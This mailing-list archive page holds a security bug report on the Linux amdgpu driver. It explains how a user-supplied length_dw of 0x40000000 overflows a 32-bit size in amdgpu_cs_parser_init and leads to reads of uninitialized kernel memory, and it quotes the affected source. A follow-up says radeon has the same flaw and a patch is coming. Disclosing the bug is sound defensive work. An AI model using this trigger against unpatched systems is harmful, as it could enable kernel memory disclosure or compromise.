Re: Integer overflow leads to uninitialization vulnerability in amdgpu_cs_parser_init

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Sorry, I found that the latest code function has become amdgpu_cs_pass1, and radeon_cs_parser_init has the same problem.And i will send the patch.

whitehat002 whitehat002 <hackyzh002@xxxxxxxxx> 于2023年4月18日周二 11:39写道:
Hello, 

I am going to file a security bug.

VULNERABILITY DETAILS

ioctl$AMDGPU_CS will call amdgpu_cs_ioctl which will call amdgpu_cs_parser_init. The type of size is unsigned(4 bytes)[1]. And size is assigned from p->chunks[i].length_dw[2] which is assigned from user_chunk.length_dw[3], which type is __u32[4](4 bytes, under user control). If size is 0x40000000, there will be an integer overflow, size will be zero after size = sizeof(uint32_t)[5]. Although there is an overflow check in kvmalloc_array[6], but it will just check size_t overflow(8 bytes), so it will not notice this one. copy_from_user will not copy anything, if size is zero. So p->chunks[i].kdata will be filled with the last time used data, because kvmalloc_array[6] is called without __GFP_ZERO flag. Finally it will access the uninitialized data[7].

```
struct drm_amdgpu_cs_chunk {
__u32 chunk_id;
__u32 length_dw; // [4]
__u64 chunk_data;
};


static int amdgpu_cs_parser_init(struct amdgpu_cs_parser *p, union drm_amdgpu_cs *cs)
{
struct amdgpu_fpriv *fpriv = p->filp->driver_priv;
struct amdgpu_vm *vm = &fpriv->vm;
uint64_t *chunk_array_user;
uint64_t *chunk_array;
unsigned size, num_ibs = 0; // [1]
uint32_t uf_offset = 0;
int i;
int ret;

if (cs->in.num_chunks == 0)
return -EINVAL;

chunk_array = kvmalloc_array(cs->in.num_chunks, sizeof(uint64_t), GFP_KERNEL);
if (!chunk_array)
return -ENOMEM;

p->ctx = amdgpu_ctx_get(fpriv, cs->in.ctx_id);
if (!p->ctx) {
ret = -EINVAL;
goto free_chunk;
}

/* skip guilty context job */
if (atomic_read(&p->ctx->guilty) == 1) {
ret = -ECANCELED;
goto free_chunk;
}

/* get chunks */
chunk_array_user = u64_to_user_ptr(cs->in.chunks);
if (copy_from_user(chunk_array, chunk_array_user,
  sizeof(uint64_t)*cs->in.num_chunks)) {
ret = -EFAULT;
goto free_chunk;
}

p->nchunks = cs->in.num_chunks;
p->chunks = kvmalloc_array(p->nchunks, sizeof(struct amdgpu_cs_chunk),
   GFP_KERNEL);
if (!p->chunks) {
ret = -ENOMEM;
goto free_chunk;
}

for (i = 0; i < p->nchunks; i++) {
struct drm_amdgpu_cs_chunk __user **chunk_ptr = NULL;
struct drm_amdgpu_cs_chunk user_chunk;
uint32_t __user *cdata;

chunk_ptr = u64_to_user_ptr(chunk_array[i]);
if (copy_from_user(&user_chunk, chunk_ptr,
      sizeof(struct drm_amdgpu_cs_chunk))) {
ret = -EFAULT;
i--;
goto free_partial_kdata;
}
p->chunks[i].chunk_id = user_chunk.chunk_id;
p->chunks[i].length_dw = user_chunk.length_dw; // [3]

size = p->chunks[i].length_dw; // [2]
cdata = u64_to_user_ptr(user_chunk.chunk_data);

p->chunks[i].kdata = kvmalloc_array(size, sizeof(uint32_t), GFP_KERNEL); // [6]
if (p->chunks[i].kdata == NULL) {
ret = -ENOMEM;
i--;
goto free_partial_kdata;
}
size *= sizeof(uint32_t); // [5]
if (copy_from_user(p->chunks[i].kdata, cdata, size)) {
ret = -EFAULT;
goto free_partial_kdata;
}

switch (p->chunks[i].chunk_id) {
case AMDGPU_CHUNK_ID_IB:
++num_ibs;
break;

case AMDGPU_CHUNK_ID_FENCE:
size = sizeof(struct drm_amdgpu_cs_chunk_fence);
if (p->chunks[i].length_dw * sizeof(uint32_t) < size) {
ret = -EINVAL;
goto free_partial_kdata;
}

ret = amdgpu_cs_user_fence_chunk(p, p->chunks[i].kdata, //[7]
&uf_offset);
if (ret)
goto free_partial_kdata;

break;

case AMDGPU_CHUNK_ID_BO_HANDLES:
size = sizeof(struct drm_amdgpu_bo_list_in);
if (p->chunks[i].length_dw * sizeof(uint32_t) < size) {
ret = -EINVAL;
goto free_partial_kdata;
}

ret = amdgpu_cs_bo_handles_chunk(p, p->chunks[i].kdata);
if (ret)
goto free_partial_kdata;

break;

case AMDGPU_CHUNK_ID_DEPENDENCIES:
case AMDGPU_CHUNK_ID_SYNCOBJ_IN:
case AMDGPU_CHUNK_ID_SYNCOBJ_OUT:
case AMDGPU_CHUNK_ID_SCHEDULED_DEPENDENCIES:
case AMDGPU_CHUNK_ID_SYNCOBJ_TIMELINE_WAIT:
case AMDGPU_CHUNK_ID_SYNCOBJ_TIMELINE_SIGNAL:
break;

default:
ret = -EINVAL;
goto free_partial_kdata;
}
}

ret = amdgpu_job_alloc(p->adev, num_ibs, &p->job, vm);
if (ret)
goto free_all_kdata;

if (p->ctx->vram_lost_counter != p->job->vram_lost_counter) {
ret = -ECANCELED;
goto free_all_kdata;
}

if (p->uf_entry.tv.bo)
p->job->uf_addr = uf_offset;
kvfree(chunk_array);

/* Use this opportunity to fill in task info for the vm */
amdgpu_vm_set_task_info(vm);

return 0;

free_all_kdata:
i = p->nchunks - 1;
free_partial_kdata:
for (; i >= 0; i--)
kvfree(p->chunks[i].kdata);
kvfree(p->chunks);
p->chunks = NULL;
p->nchunks = 0;
free_chunk:
kvfree(chunk_array);

return ret;
}

[Index of Archives]     [Linux DRI Users]     [Linux Intel Graphics]     [Linux USB Devel]     [Video for Linux]     [Linux Audio Users]     [Yosemite News]     [Linux Kernel]     [Linux SCSI]     [XFree86]     [Linux USB Devel]     [Video for Linux]     [Linux Audio Users]     [Linux Kernel]     [Linux SCSI]     [XFree86]
  Powered by Linux